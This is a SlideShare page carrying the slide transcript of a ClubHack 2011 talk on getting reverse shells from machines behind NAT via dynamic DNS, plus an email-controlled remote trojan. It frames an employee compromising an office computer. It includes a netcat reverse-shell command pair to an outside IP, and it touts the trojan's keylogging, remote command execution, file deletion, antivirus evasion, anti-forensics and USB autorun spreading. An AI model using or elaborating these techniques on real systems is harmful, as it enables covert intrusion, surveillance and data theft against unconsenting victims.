Your SlideShare is downloading. ×
0
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

1,414

Published on

ClubHack 2011 Hacking and Security Conference. …

ClubHack 2011 Hacking and Security Conference.
Talk - Handle Explotion of Remote System Without Being Online
Speaker - Merchant Bhaumik

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,414
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
52
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
  • 2. Who Am I ?• Currently Helping local law-enforcement And Helping In Securing Some Government Websites• Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection )• Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
  • 3. Presentation Flow…….•Reverse Shell Using Dynamic-Dns Concepts• Getting Data From Victim Computer Using Email Tool
  • 4. We Will Understand ThisMechanism By Considering One Scenario……..
  • 5. Jack’s Situaion……….Jack Working In A Company ...............!In Which All Computers Behind The NATBOX……. ………………………!And He Just Decided To Break One Of TheSystem Of His Office And Getting Shell FromOffice To Home Computer
  • 6. Problems For Jack….•Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections………….•He Don’t Know What IP Address Is Allocated By His ISP•He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
  • 7. Good Thing For Jack….• Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
  • 8. I# INCLUDE< REVERSE SHELL >
  • 9. Why Reverse Shell ?•Reverse Shell is one of the powerful methodfor Bypassing Network Intrusion DetectionSystems , Firewalls ( Most Of The) etc• Because Some of this network intrusiononly monitors In-bound connection … Notthe Out-bound ……• Jack Has DMZ Network In His Office…..
  • 10. Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 11. Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4Step I : Start Handleron port 4343nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
  • 12. Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  • 13. But What’s Wrong With Jack?He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
  • 14. Solution….Attacker Is “Offline” But Still He Will Get Reverse Shell
  • 15. My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional !Vuln. Injection N All that !Victim Sends Reverse Shell For Reverse Shell Scenario !… To Attacker Machine !.. Attacker Wins !
  • 16. Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
  • 17. Mechanism• If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell…………….•Else keep running in the victim machine and waits for Ack. From attacker’ machine…
  • 18. Dynamic DNS Way…. (Initially ! )• First Part : catchme.dyndns-ip.com ( 255.255.255.255 )• Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 19. Dynamic DNS Way…. (Finally ! )• First Part : catchme.dyndns-ip.com ( 127.0.0.1 )• Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 20. Metasploit………….!!!!!•You can embed my method (or My Exe ) with metasploit Payload which is ofyour choice .* The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
  • 21. Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 22. Time To Enjoy Cooked Cookies And Recipes !!
  • 23. Demo
  • 24. II# INCLUDE <EMAIL TOOL >
  • 25. Normal Remote Trojans & Viruses ! Attacker Victim(Must Be Online !) (Must Be Online !)
  • 26. My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR ORMAY NOT ONLINE !! MAY NOT ONLINE !!
  • 27. So, How It Works ?? ZombieAttacker Victim
  • 28. But, Who Is Zombie??@ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
  • 29. Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger !This All Stuff With Gmail , Yahoo , Hotmail………!!
  • 30. About It !It is a simple application which Once Up & Going on Victim‟Computer , Attacker can Handle it using Gmail , Yahoo , HotmailEmail Services…There is no need to be Online for Attacker to attack the VictimSystem…..Attacker Has to send attack instructions to Any of the mailservice & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!”As Victim Connects to the internet …. Attack Launches & theresults are automatically sent back to the Attacker‟s emailAddress…..
  • 31. Cool Benefits !!If the email account is used by using One of like below then it is totally Anti-Forensic ! No Reverse Detection Is Possible !Create Unique password for all individual victims who areinfected …Ability to handle multiple clients simultaneously …..Delete Files In Victims Computer by Simply Sending An Email..No Antivirus Can Detect Attack Because Of HTTPS ……
  • 32. Tool Syntax …..Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
  • 33. Snap Shot 1…(Load Attack Instructions) Password For Individual VictimSend Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
  • 34. Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
  • 35. Why Gmail ??
  • 36. No Fear Of Detection 1 No Direct Connection Between Attacker & VictimAttacker Victim
  • 37. No Fear Of Detection 2No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct ItSelf…….!
  • 38. How To Spread This Code??Autorun.inf by USB Drives……….Phisical Access Of Victim‟s System…..During Metasploit Explotion ……
  • 39. Further Possible Development !!This Code Is Flexible Enough To Develop Further By My HackerFriends….It Is Also Possible For Future To Send Exploits OrTrojans By Using This Code…….Any One Can Send Exploits , Trojans , RootKits , BackDoors BySimply Attaching It With Email And Sending It To His Own AccountOr Account That is Configured In Victim‟ Code………
  • 40. Pros N Cons 1 ! ( Be Transparent !! )Advantages are that the attacker never goin to caught if he/sheusing the browser like TOR , Anononymizer , VPNs or AnyPROXy…. For accessing the attacking gmail account.No Antivirus can detect the Instruction data because all trafficgonna come from HTTPS …..!Only single email account of gmail goin to use for both the side.Attacker and victim machine both goin to connect same accountbut attacker knows ,But Victim Don‟t !!
  • 41. Pros N Cons 2Disadvantage is that , if the victim has habit of checking thecurrent connections using commands like „netstat –n‟ thenpossibility to detect Gmail connection when actually there is nobrowser activity. But still it is difficult to detect ………. Becauseprocess is running in Hidden mode….
  • 42. Hands On Time..! ( Demo)
  • 43. For More……backdoor.security@gmail.com
  • 44. Thanks GuysFor CheckingIt Out …….!

×